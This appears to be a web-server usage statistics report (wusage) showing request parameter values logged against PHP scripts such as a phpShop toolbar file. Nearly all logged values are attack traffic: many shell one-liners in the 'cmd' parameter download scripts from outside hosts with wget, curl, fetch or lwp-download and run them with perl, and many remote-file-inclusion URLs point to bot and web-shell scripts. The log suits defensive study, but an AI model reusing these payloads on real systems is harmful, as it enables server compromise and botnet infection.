ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
cd /tmp;rm -rf fuck.txt;wget http://h1.ripway.com/renatas2/f
uck.txt;fetch http://h1.ripway.com/renatas2/fuck.txt;curl -O
http://h1.ripway.com/renatas2/fuck.txt;perl fuck.txt;rm -rf
fuck.txt
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
cd /tmp;rm -rf ownz*;wget http://enigmax1.kit.net/ownz.txt;l
wp-download http://enigmax1.kit.net/ownz.txt;fetch http://en
igmax1.kit.net/ownz.txt;curl -o ownz.txt http://enigmax1.kit
.net/ownz.txt;GET http://enigmax1.kit.net/ownz.txt >ownz.txt
;lynx -source http://enigmax1.kit.net/ownz.txt >ownz.txt;per
l ownz.txt;rm -rf ownz.txt*
1
cd /tmp;wget http://h1.ripway.com/marley/tut.txt;perl tut.tx
t;rm tut.txt
1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://ownsparaficar.googlepages.com/funfo.txt? 13
OTHER: 957
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm pemlk.txt;wget http://189.24.81.113:8080/pemlk.tx
t;fetch http://189.24.81.113:8080/pemlk.txt;lwp-download htt
p://189.24.81.113:8080/pemlk.txt;curl -O http://189.24.81.11
3:8080/pemlk.txt;lynx http://189.24.81.113:8080/pemlk.txt;pe
rl pemlk.txt;rm pemlk.txt?
1
Parameter path[docroot]
ValueAccesses
http://www.neoncomanda.kit.net/tool25.dat? 14
http://www.vsm.gov.tr/gorselbasin/docs/gorselbasin/aw128.txt
?
10
http://h1.ripway.com/brunoz/botnetpriv8.txt? 5
http://www.vsm.gov.tr/ow33.txt? 3
http://raptortx.googlepages.com/inc3.txt?? 3
http://www.thebrn.kit.net/pbot.txt? 3
OTHER: 931
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 15
http://www.panograf.net/ircd/spread.txt? 10
OTHER: 945
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www3.bloglog.com.br/p.t? 5
http://electrobox106.com/ow33.txt? 4
OTHER: 961
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://201.37.71.117:8090/tool25.txt? 9
OTHER: 961
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm bot123ffiii.txt;wget www.xsenharox.xpg.com.br/bot
123ffiii.txt;fetch www.xsenharox.xpg.com.br/bot123ffiii.txt;
lwp-download www.xsenharox.xpg.com.br/bot123ffiii.txt;curl -
O www.xsenharox.xpg.com.br/bot123ffiii.txt;lynx www.xsenharo
x.xpg.com.br/bot123ffiii.txt;perl bot123ffiii.txt
2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://human-design.ru/adm/faqsupport/config/exp667.txt? 7
http://h1.ripway.com/DiegoVirus/pbot.txt? 5
http://mateus07.xpg.com.br/lol? 4
OTHER: 954
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm srz.txt;wget http://www.freewebs.com/kctdaporra/s
rz.txt;fetch http://www.freewebs.com/kctdaporra/srz.txt;lwp-
download http://www.freewebs.com/kctdaporra/srz.txt;curl -O
http://www.freewebs.com/kctdaporra/srz.txt;lynx http://www.f
reewebs.com/kctdaporra/srz.txt;perl srz.txt;rm -rf srz.txt*
1
cd /tmp;rm ful.txt;wget http://71.41.190.203/ful.txt;fetch h
ttp://71.41.190.203/ful.txt;lwp-download http://71.41.190.20
3/ful.txt;curl -O http://71.41.190.203/ful.txt;lynx http://7
1.41.190.203/ful.txt;perl ful.txt;rm -rf ful.txt*
1
Parameter path[docroot]
ValueAccesses
http://gavindegraw.onthestreets.net/flyer/hehe.txt? 10
http://www.oslutadores.com/?id=23530 8
http://nodan.110mb.com/tool25.txt? 6
OTHER: 944
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://raptortx.googlepages.com/inc3.txt?? 4
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm sta.txt;wget http://189.24.36.96:9090/sta.txt;fet
ch http://189.24.36.96:9090/sta.txt;lwp-download http://189.
24.36.96:9090/sta.txt;curl -O http://189.24.36.96:9090/sta.t
xt;lynx http://189.24.36.96:9090/sta.txt;perl sta.txt;rm sta
.txt?
1
Parameter path[docroot]
ValueAccesses
http://www.freewebs.com/b0mb4do1337/p.txt?? 6
http://www.stdr.xpg.com.br/compito? 5
OTHER: 958
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://normanzito.iespana.es/http.txt?? 6
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.freewebs.com/playssonn/p.txt?? 5
http://bsthank.t35.com/Phpbots/wpK.txt? 4
http://www.chamala.kit.net/tool25.txt 4
http://lol123.fileave.com/script9.txt?? 4
http://www.noixehfoda.xpg.com.br/sss.txt? 3
OTHER: 950
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://206.71.148.228/bertao.txt;curl -O -f htt
p://206.71.148.228/bertao.txt;lynx -source http://206.71.148
.228/bertao.txt;lwp-rget http://206.71.148.228/bertao.txt;fe
tch http://206.71.148.228/bertao.txt;perl bertao.txt;rm -rf
bertao.txt
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://64.32.13.169/ma.txt? 3
http://www.txd.conexaostore.com/tester 3
http://freewebs.com/0m4rc170/botz.txt? 3
http://biancaa1990.fileave.com/script9.txt?? 3
http://greedy.we.bs/a.txt? 3
http://www.apocalypticduck.com/skins/advanced/config/exp667.
txt?
3
http://www.r0n4n.kit.net/Eisoo.txt? 2
http://demos.na.googlepages.com/a.txt??? 2
http://baixinho.50webs.com/tool25.txt? 2
http://usuarios.arnet.com.ar/larry123/prot.txt? 2
OTHER: 944
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://67.19.246.132/~train/spread.txt? 6
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.sdicampania.it/iLeGaiS.txt? 2
http://om-autoteile.eu/http.txt?? 2
http://mtvktv.no-ip.org/php.txt? 2
http://www.stdr.xpg.com.br/teste_spam.txt? 2
http://qlzr.iespana.es/sb4.gif? 2
http://www.ilegais.xpg.com.br/makronaa????? 1
http://www.chapolin-ownz.us/inbox.txt? 1
http://www.emriz.com/fix.txt?? 1
http://www.hackmsn.org/11.txt? 1
http://www.epr0.kit.net/c? 1
OTHER: 955
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf pacote*;wget http://br.geocities.com/p4ulo.ha
ck/pacote.txt;lwp-download http://br.geocities.com/p4ulo.hac
k/pacote.txt;fetch http://br.geocities.com/p4ulo.hack/pacote
.txt;curl -o pacote.txt http://br.geocities.com/p4ulo.hack/p
acote.txt;GET http://br.geocities.com/p4ulo.hack/pacote.txt
>pacote.txt;lynx -source http://br.geocities.com/p4ulo.hack/
pacote.txt >pacote.txt;perl pacote.txt;rm -rf pacote.txt*
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.abonesin.com/linxscan.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.iff.coop/.../bre.txt? 4
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://geocities.yahoo.com.br/bsthank/packetx.txt? 1
http://www.liceobrainstorm.cl/educacion//claroline/auth/exta
uth/drivers/config/tester.txt?
1
http://www.xplproxysx.kit.net/cmdxkn.txt? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm -rf *;cd /tmp;lwp-download http://h1.ripway.com/k
aiooo/safada.txt;fetch http://h1.ripway.com/kaiooo/safada.tx
t;curl -o safada.txt http://h1.ripway.com/kaiooo/safada.txt;
wget http://h1.ripway.com/kaiooo/safada.txt;perl safada.txt
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://freewebs.com/normancito/prot.txt?? 1
http://ilegals.ifrance.com/bbc?? 1
http://ilegals.ifrance.com/bbc??? 1
http://boladaojunin.iespana.es/testeinbox2.txt?? 1
http://javaatualiza.t35.com/uollll.txt? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://projectyenor2.iespana.es/goo.txt;curl -O
http://projectyenor2.iespana.es/goo.txt;fetch http://projec
tyenor2.iespana.es/goo.txt;lynx http://projectyenor2.iespana
.es/goo.txt;lwp-download http://projectyenor2.iespana.es/goo
.txt;perl goo.txt
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://freewebs.com/normancito/em.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://204.11.228.115/id.txt? 9
OTHER: 961
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://mensagenss.hospedagemdesite.com/tool25/mIltool25.dat?
1
http://216.222.194.67/~crew/bitch.txt?? 1
http://www.freewebs.com/normancito/em.txt?? 1
http://smokan.xpl.googlepages.com/bot2.txt? 1
http://proxysx.t35.com/x0.txt? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm tut.txt;wget http://malware.t35.com/tut.txt;fetch
http://malware.t35.com/tut.txt;lwp-download http://malware.
t35.com/tut.txt;curl -O http://malware.t35.com/tut.txt;lynx
http://malware.t35.com/tut.txt;perl tut.txt;rm -rf tut.txt*
1
Parameter mosConfig_absolute_path
ValueAccesses
http://overowns.googlepages.com/testera.txt? 11
OTHER: 958
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://freewebs.com/larryx23/sk1.txt?? 1
http://www.carpegamer.forbrazil.com.br/novo/back.txt?? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;killall perl -9;rm -rf *.txt;GET http://www.murilok.
pop3.ru/asc2.txt > asc2.txt;perl asc2.txt;rm asc2.txt
1
cd /tmp;wget http://decorosso.t35.com/ecolo.txt;fetch http:/
/decorosso.t35.com/ecolo.txt;curl -O http://decorosso.t35.co
m/ecolo.txt;lwp-download http://decorosso.t35.com/ecolo.txt;
perl ecolo.txt;rm ecolo.txt
1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://216.222.194.67/bitch.txt???? 1
ftp://66.0.134.134/h.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://www.mateus.t5.com.br/asdasd.txt;fetch ht
tp://www.mateus.t5.com.br/asdasd.txt;lwp-download http://www
.mateus.t5.com.br/asdasd.txt;curl -O http://www.mateus.t5.co
m.br/asdasd.txt;lynx http://www.mateus.t5.com.br/asdasd.txt;
perl asdasd.txt;rm -rf asdasd.txt
1
Parameter mosConfig_absolute_path
ValueAccesses
http://ownzera.googlepages.com/readme.txt? 9
http://206.71.148.89/pbot.txt??] 6
http://www.cfr.cl/mail/bitch.txt?? 4
OTHER: 950
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://orkutnova.100free.com/inbox.txt? 1
http://h1.ripway.com/fuckz/botnetpriv8.txt? 1
http://www.vsm.gov.tr/aw128.txt? 1
http://www.baltmusic.lv/htmlarea/lang/_vtni_cgi_/testamc.txt
?
1
http://www.infostec.org/owned/txt/fdc.txt 1
http://yahwek.dll.googlepages.com/phpbot1.txt? 1
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 8
OTHER: 962
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://qlzr.iespana.es/killall.gif? 1
http://www.vwbr.com.br/virus.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.oslutadores.com/?id=23530 9
http://biancaa1990.fileave.com/script9.txt?? 4
OTHER: 957
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.rj2009.kit.net/ddd.txt?? 1
http://pc2you.ro/classes/phpmailer/config/exp667.txt? 1
http://qlzr.host.sk/killall.gif? 1
http://qlzr.host.sk/sb4.gif? 1
http://www.kibarnakliyat.com:8383/bitch.txt???? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.defacerz.org/testeinbox.txt? 4
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://ir4dex.kit.net/cmd/list.txt?? 1
http://www.freewebs.com/xlip3/bot.txt? 1
http://www.freewebs.com/normancito/bota.txt?? 1
http://vcsok.com/echo?http://www.freewebs.com/normancito/bot
a.txt??
1
http://www.cfr.cl/mail/bot.txt?? 1
http://pucorp.org/pbot.txt? 1
www.pedr0.kit.net/new.txt? 1
http://x-tal.ajou.ac.kr/zeroboard/skin/zero_vote/evilx? 1
www.pedr0.kit.net/pb.txt? 1
OTHER: 961
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://usuarios.arnet.com.ar/larry123/nork.txt?? 4
http://www.freewebs.com/yahwek/phpbot.txt? 4
http://72.21.36.156/s.txt? 4
http://www.apocalypticduck.com/skins/advanced/config/tester.
txt?
4
http://www.scotao.com/teste.txt? 4
http://www.lordxpl.xpg.com.br/own.txt?? 3
http://www.apocalypticduck.com/skins/advanced/config/exp667.
txt?
3
http://www.freewebs.com/crew-master/pbot.txt 3
OTHER: 941
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.pucorp.t5.com.br/lp.txt? 4
http://www.freewebs.com/sur00tsecurity/bot.txt? 1
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://chat.wins.com.br:8080/httd.txt? 4
http://radio.radios.fm.br:8080/httd.txt? 4
http://216.83.134.89/dsho.txt? 4
http://electrobox106.com/ow33.txt? 3
http://pag.it/a1.txt? 3
http://72.21.36.157/s2.txt? 3
http://demos.na.googlepages.com/a.txt??? 3
OTHER: 946
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://om-autoteile.eu/sk.txt?? 3
http://freewebs.com/0m4rc170/zip.txt? 2
http://epr0.kit.net/xulapa.txt? 1
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://sanwall.coolpage.biz/sox3.txt? 3
http://www.superlab.jazztel.es/safe.gif? 3
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.zeyteen.net/aho.txt?? 3
http://ownedson.110mb.com/a.txt? 3
http://lifetogether.us./lt/family/bitch.txt??? 1
http://qlzr.iespana.es/p2.gif? 1
http://slcdelivery.com/banners/c.txt? 1
OTHER: 961
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://freewebs.com/0m4rc170/botz.txt? 3
http://puxo.ifrance.com/cmd.??http://puxo.ifrance.com/cmd.??
3
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.dibernet.com.br/~infostec/bot.txt 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://206.71.148.89/tool25.txt? 3
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://63.247.81.138/~ucrol/maya1.txt??? 3
http://www.rj2009.kit.net/p.txt? 2
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://scanbx.iespana.es/bitch.txt?? 3
http://freewebs.com/0m4rc170/zip.txt? 3
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt;
fetch http://SITE/bot.txt;lwp-download http://www.ownedson.1
10mb.com/bn.txt;curl -O http://www.ownedson.110mb.com/bn.txt
;lynx http://www.ownedson.110mb.com/bn.txt;perl bn.txt
3
Parameter path[docroot]
ValueAccesses
http://www.powertecmt.com.br/img_imagens/ultimate.txt? 2
OTHER: 965
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/yahwek/sete.txt? 3
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://electrobox106.com/bpm456456461321654.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.txd.conexaostore.com/tester? 3
http://h1.ripway.com/sur00t/testador.txt? 3
OTHER: 964
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://h1.ripway.com/hospenergy/energy/crime.txt? 1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.freewebs.com/normancito/asdasd.txt?? 3
http://www.pixeldust.net/sox.txt? 3
http://www.vsm.gov.tr/ow33.txt? 3
http://hrrhq.dyndns.org/nuke//modules/Forums/admin/0123.jpg?
3
http://www.vsm.gov.tr/pwnd/http.txt?? 3
http://kamstorn.googlepages.com/botnet.txt? 3
http://64.32.13.161/ma.txt 3
http://usuarios.arnet.com.ar/larry123/ka.txt? 3
http://www.stdr.xpg.com.br/compito? 3
http://64.32.13.169/ma.txt? 3
OTHER: 940
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://h1.ripway.com/rootz/tut.txt? 6
http://baixinho.we.bs/tool25.txt? 3
OTHER: 961
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://joaobenner.fileave.com/script9.txt?? 2
http://chat.wins.com.br:8080/httd.txt 2
OTHER: 966
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://www.noticiasfamososblog.xpg.com.br/testeinbox.txt? 1
http://www.elhames.co.uk/r57.txt? 1
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://raptorupload.googlepages.com/inc3.txt?? 2
http://ilegals.ifrance.com/enos??? 2
http://bgeunivers.free.fr/modules/AllMyGuests/tool25.dat? 2
http://www.corsemusique.com/portail/agenda/muie.txt? 2
OTHER: 962
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://76.162.170.34/Photos/pbot?? 6
http://arcadenoe.sapo.pt/files/php.txt? 1
http://pachyz.iespana.es/comando.txt? 1
OTHER: 962
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.pucorp.t5.com.br/sub.txt? 2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://h1.ripway.com/rootz/botnetpriv8.txt? 2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://69.93.214.234/~egacali/images/1.txt? 2
http://idz.web22.f3.k8.com.br/inbox.txt? 2
http://200.58.115.64/~electrob/ow33.txt? 2
http://www.modelismo.alternativo.nom.br//poll/polldata/readm
e.txt??
2
http://www.freewebs.com/yahwek/xisde.txt.txt? 2
OTHER: 960
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://xsenharox.xpg.com.br/botnet1000.txt? 2
http://redinhu.v10.com.br/pbot.txt? 1
OTHER: 967
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.zeyteen.net/aho.txt?? 2
http://klzor.web21.f3.k8.com.br/testador.txt 2
http://www.ligseg.com.br/id.gif? 2
http://bishits.com/a/safe.txt? 2
http://puxo.ifrance.com/tester.txt? 2
http://no.spam.ee/~tonu/phpshell/r57shell.txt? 2
http://mtvktv.no-ip.org/php.txt? 2
OTHER: 956
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter path[docroot]
ValueAccesses
http://freewebs.com/0m4rc170/asd.txt? 2
OTHER: 968
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://puxo.ifrance.com/rave.?? 2
http://www.capsoir.com/images/TRA.txt 2
http://regulamento.no-ip.biz/botlogin.txt? 2
http://store.pointclick.ws/vsadmin/safe.txt? 2
http://www.flyafac.com/images/kua.txt? 2
http://www.freewebs.com/sur00tsecurity/bot.txt? 2
http://www.freewebs.com/sur00tsecurity/b0t.txt? 2
http://vsffdp.iespana.es/testeinbox2.txt? 2
http://cornuletz.angelfire.com/c99in.txt? 2
http://puxo.ifrance.com/57.?? 2
OTHER: 950
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://projectyenor2.iespana.es/file234.txt;cur
l -O http://projectyenor2.iespana.es/file234.txt;fetch http:
//projectyenor2.iespana.es/file234.txt;lynx http://projectye
nor2.iespana.es/file234.txt;lwp-download http://projectyenor
2.iespana.es/file234.txt;perl file234.txt??
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
ts/com_phpshop/toolbar.phpshop.html.php
970
Parameters by Submitted Value
Parameter mosConfig_absolute_path
ValueAccesses
http://www.gratisweb.com/atk33/rave.txt? 2
http://joaobenner.fileave.com/scipt9.txt?? 2
http://64.8.110.2/xpl/safe.txt? 2
http://freewebs.com/normancito/kaka.txt?? 2
http://www.http://usuarios.arnet.com.ar/adrikrasnow/speed.tx
t?
2
http://joaobenner.googlepages.com/script2.txt?? 2
http://c4sh1234.100free.com/sc.gif? 2
http://h1.ripway.com/DiegoVirus/pbot2.txt? 2
http://infected1249.iespana.es/asc.txt? 2
http://www.xsenhalol.xpg.com.br/sasao????????? 2
OTHER: 950
ScriptTotal Accesses
/wusage/summary/cgi.html//oneadmin/ecommerce/sampleecommerce
.php
970
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm start.txt;wget http://189.24.48.179:8090/start.tx
t;fetch http://189.24.48.179:8090/start.txt;lwp-download htt
p://189.24.48.179:8090/start.txt;curl -O http://189.24.48.17
9:8090/start.txt;lynx http://189.24.48.179:8090/start.txt;pe
rl start.txt;rm start.txt?
1
OTHER: 969
ScriptTotal Accesses
/wusage/summary/cgi.html/distribution/administrator/componen
